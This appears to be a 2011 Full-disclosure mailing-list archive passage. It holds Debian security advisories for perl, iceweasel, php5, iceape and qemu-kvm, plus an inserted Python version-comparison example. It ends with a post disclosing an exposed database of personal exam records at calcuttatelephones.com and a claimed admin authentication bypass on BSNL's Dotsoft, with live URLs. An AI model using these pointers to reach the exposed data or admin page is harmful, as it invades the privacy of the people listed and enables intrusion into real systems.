CVE ID : CVE-2010-1447 
Debian Bug : 631529

It was discovered that Perl's Safe module - a module to compile and
execute code in restricted compartments - could be bypassed.

Please note that this update is known to break Petal, an XML-based
templating engine (shipped with Debian 6.0/Squeeze in the package
libpetal-perl, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=582805
for details). A fix is not yet available. If you use Petal, you might
consider putting the previous Perl packages on hold.

For the oldstable distribution (lenny), this problem has been fixed in
version 5.10.0-19lenny5.

For the stable distribution (squeeze), this problem has been fixed in
version 5.10.1-17squeeze2.

For the unstable distribution (sid), this problem has been fixed in
version 5.12.3-1.

We recommend that you upgrade your perl packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4OCOMACgkQXm3vHE4uylpFjwCgxNO0AgBmr0EM17E3rbK4Yxfo
2/gAoIuX2QExRCbSywe476I8kyKsojEq
=Lcl2
-END PGP SIGNATURE-



[Full-disclosure] [SECURITY] [DSA 2268-1] iceweasel security update

2011-07-01 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2268-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 01, 2011  http://www.debian.org/security/faq
- -

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-0083 CVE-2011-0085 CVE-2011-2362 CVE-2011-2363 
 CVE-2011-2365 CVE-2011-2371 CVE-2011-2373 CVE-2011-2374 
 CVE-2011-2376 

Several vulnerabilities have been found in Iceweasel, a web browser
based on Firefox:

CVE-2011-0083 / CVE-2011-2363

   regenrecht discovered two use-after-frees in SVG processing, which
   could lead to the execution of arbitrary code.

CVE-2011-0085

   regenrecht discovered a use-after-free in XUL processing, which
   could lead to the execution of arbitrary code.

CVE-2011-2362

   David Chan discovered that cookies were insufficiently isolated.

CVE-2011-2371

   Chris Rohlf and Yan Ivnitskiy discovered an integer overflow in the
   Javascript engine, which could lead to the execution of arbitrary
   code.

CVE-2011-2373

   Martin Barbella discovered a use-after-free in XUL processing,
   which could lead to the execution of arbitrary code.

CVE-2011-2374

   Bob Clary, Kevin Brosnan, Nils, Gary Kwong, Jesse Ruderman and
   Christian Biesinger discovered memory corruption bugs, which may 
   lead to the execution of arbitrary code.

CVE-2011-2376

   Luke Wagner and Gary Kwong discovered memory corruption bugs, which
   may lead to the execution of arbitrary code.

For the oldstable distribution (lenny), this problem has been fixed in
version 1.9.0.19-12 of the xulrunner source package.

For the stable distribution (squeeze), this problem has been fixed in
version 3.5.16-9.

For the unstable distribution (sid), this problem has been fixed in
version 3.5.19-3.

For the experimental distribution, this problem has been fixed in
version 5.0-1.

We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] [SECURITY] [DSA 2262-2] php5 update

2011-07-01 Thread Moritz Muehlenhoff

------------------------------------------------------------------------
Debian Security Advisory DSA-2266-2                   secur...@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
July 01, 2011                          http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: php5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-2531 CVE-2011-0420 CVE-2011-0421 CVE-2011-0708 
 CVE-2011-1153 CVE-2011-1466 CVE-2011-1471 CVE-2011-2202 

The update for CVE-2010-2531 for the oldstable distribution (lenny)
introduced a regression, which led to additional output being written
to stdout.

For the oldstable distribution (lenny), this problem has been fixed in
version 5.2.6.dfsg.1-1+lenny13.

We recommend that you upgrade your php5 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] [SECURITY] [DSA 2269-1] iceape security update

2011-07-01 Thread Moritz Muehlenhoff

------------------------------------------------------------------------
Debian Security Advisory DSA-2269-1                   secur...@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
July 01, 2011                          http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: iceape
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-0083 CVE-2011-0085 CVE-2011-2362 CVE-2011-2363
 CVE-2011-2365 CVE-2011-2371 CVE-2011-2373 CVE-2011-2374
 CVE-2011-2376

Several vulnerabilities have been found in the Iceape internet suite, an
unbranded version of Seamonkey:

CVE-2011-0083 / CVE-2011-2363

   regenrecht discovered two use-after-frees in SVG processing,
   which could lead to the execution of arbitrary code.

CVE-2011-0085

   regenrecht discovered a use-after-free in XUL processing, which
   could lead to the execution of arbitrary code.

CVE-2011-2362

   David Chan discovered that cookies were insufficiently isolated.

CVE-2011-2371

   Chris Rohlf and Yan Ivnitskiy discovered an integer overflow in the
   Javascript engine, which could lead to the execution of arbitrary
   code.

CVE-2011-2373

   Martin Barbella discovered a use-after-free in XUL processing,
   which could lead to the execution of arbitrary code.

CVE-2011-2374

   Bob Clary, Kevin Brosnan, Nils, Gary Kwong, Jesse Ruderman and
   Christian Biesinger discovered memory corruption bugs, which may
   lead to the execution of arbitrary code.

CVE-2011-2376

   Luke Wagner and Gary Kwong discovered memory corruption bugs, which
   may lead to the execution of arbitrary code.


The oldstable distribution (lenny) is not affected. The iceape
package only provides the XPCOM code.

For the stable distribution (squeeze), this problem has been fixed in
version 2.0.11-6.

For the unstable distribution (sid), this problem has been fixed in
version 2.0.14-3.

We recommend that you upgrade your iceape packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] [SECURITY] [DSA 2270-1] qemu-kvm security update

2011-07-01 Thread Moritz Muehlenhoff

------------------------------------------------------------------------
Debian Security Advisory DSA-2270-1                   secur...@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
July 01, 2011                          http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: qemu-kvm
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE ID : CVE-2011-2512 
Debian Bug : 631975

It was discovered that incorrect sanitising of virtio queue commands in
KVM, a solution for full virtualization on x86 hardware, could lead to
denial of service or the execution of arbitrary code.


The oldstable distribution (lenny) is not affected by this problem.

For the stable distribution (squeeze), this problem has been fixed in
version 0.12.5+dfsg-5+squeeze4.

For the unstable distribution (sid), this problem has been fixed in
version 0.14.1+dfsg-2.

We recommend that you upgrade your qemu-kvm packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

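Each of the four advisories above (DSA-2268-1, DSA-2266-2, DSA-2269-1 and DSA-2270-1) states a fixed version per suite, and the practical check is whether an installed version predates it. As an added example, not part of the advisories or of Debian's tooling, the following Python extracts those "fixed in version" statements from a DSA body and compares versions with a re-implementation of dpkg's ordering rules (epoch, upstream version, Debian revision, with `~` sorting before everything); on a real system `dpkg --compare-versions` is the authoritative implementation. The sample advisory text is quoted from DSA-2268-1 above.

```python
import re
from itertools import zip_longest

# Constructed sample: the "fixed in version" paragraphs quoted from DSA-2268-1 above.
SAMPLE_DSA = """For the stable distribution (squeeze), this problem has been fixed in
version 3.5.16-9.

For the experimental distribution, this problem has been fixed in
version 5.0-1.
"""
FIXED_RE = re.compile(r"For the (\w+) distribution(?: \((\w+)\))?, this problem "
                      r"has been fixed in\s+version (\S+)")

def _order(c):
    # dpkg's character weight: '~' sorts before anything, even the end of the string (0)
    return -1 if c == "~" else ord(c) if c.isalpha() else ord(c) + 256

def _verrevcmp(a, b):
    # dpkg compares alternating runs: non-digits by character weight (the shorter run is
    # padded with 0, so "1.0" < "1.0.1" and "9~bpo" < "9"), then digit runs numerically.
    for (na, da), (nb, db) in zip_longest(re.findall(r"(\D*)(\d*)", a),
                                          re.findall(r"(\D*)(\d*)", b), fillvalue=("", "")):
        width = max(len(na), len(nb))
        wa = [_order(c) for c in na] + [0] * (width - len(na))
        wb = [_order(c) for c in nb] + [0] * (width - len(nb))
        if wa != wb:
            return -1 if wa < wb else 1
        if int(da or 0) != int(db or 0):
            return -1 if int(da or 0) < int(db or 0) else 1
    return 0

def compare_versions(v1, v2):
    """-1, 0 or 1, like dpkg --compare-versions lt / eq / gt."""
    def split(v):  # [epoch:]upstream_version[-debian_revision]
        epoch, _, rest = v.partition(":") if ":" in v else ("0", "", v)
        upstream, _, rev = rest.rpartition("-") if "-" in rest else (rest, "", "")
        return int(epoch), upstream, rev
    e1, u1, r1 = split(v1)
    e2, u2, r2 = split(v2)
    return (e1 > e2) - (e1 < e2) or _verrevcmp(u1, u2) or _verrevcmp(r1, r2)

def fixed_versions(advisory_text):
    """Suite codename (or suite name when there is none) -> fixed version string."""
    return {codename or suite: ver.rstrip(".")
            for suite, codename, ver in FIXED_RE.findall(advisory_text)}

def is_vulnerable(installed, suite, advisory_text=SAMPLE_DSA):
    """True when the installed package version predates the fix for that suite."""
    return compare_versions(installed, fixed_versions(advisory_text)[suite]) < 0
```

The installed version for a real check comes from `dpkg-query -W -f='${Version}' iceweasel` (or the package named in the advisory), which this example does not run.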


[Full-disclosure] Calcuttatelephones.com Database Disclosure, BSNL- Dotsoft (Super Admin) Auth Bypass Vulnerability

2011-07-01 Thread Pradip Sharma
Calcuttatelephones.com Database Disclosure, Directory Listing
http://www.calcuttatelephones.com http://www.calcuttatelephones.com/jto/

Demo:
http://www.flickr.com/photos/64621175@N03/5885441132/in/photostream/

Database containing 2600 plus records.

-- phpMyAdmin SQL Dump
-- version 2.5.7-pl1
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Server version: 4.0.26
-- PHP Version: 4.2.0
--
-- Database: `bsnl`
--
-- --------------------------------------------------------
--
-- Table structure for table `jtoresult`
--

DROP TABLE IF EXISTS `jtoresult`;
CREATE TABLE `jtoresult` (
  `roll_no` varchar(40) NOT NULL default '',
  `circle_appear` varchar(60) NOT NULL default '',
  `name` varchar(150) NOT NULL default '',
  `community` varchar(50) NOT NULL default '',
  `ph_status` varchar(20) NOT NULL default '',
  `merit` varchar(20) NOT NULL default '',
  `circle_code` varchar(10) NOT NULL default '',
  PRIMARY KEY  (`roll_no`)
) TYPE=MyISAM;


BSNL- Dotsoft (Super Admin) Auth Bypass Vulnerability

Profile:

*Dotsoft* is in-house developed software, integrating the Commercial
Activities, Telecom Billing & Accounting, FRS and Directory Enquiry. It has
been implemented in *171* SSAs (Districts) across the country.

Company URL:

http://dotsoft.bsnl.co.in/

SUPER ADMIN LOGON:
http://dotsoft.bsnl.co.in/helpdesk/admin.asp

Demo:
http://www.flickr.com/photos/64621175@N03/5884121702/in/photostream
http://www.flickr.com/photos/64621175@N03/5883556231/in/photostream

Pradip Sharma
Cyber Security Research Analyst,
iSolution Software Systems Pvt. Ltd. - www.isolutionindia.com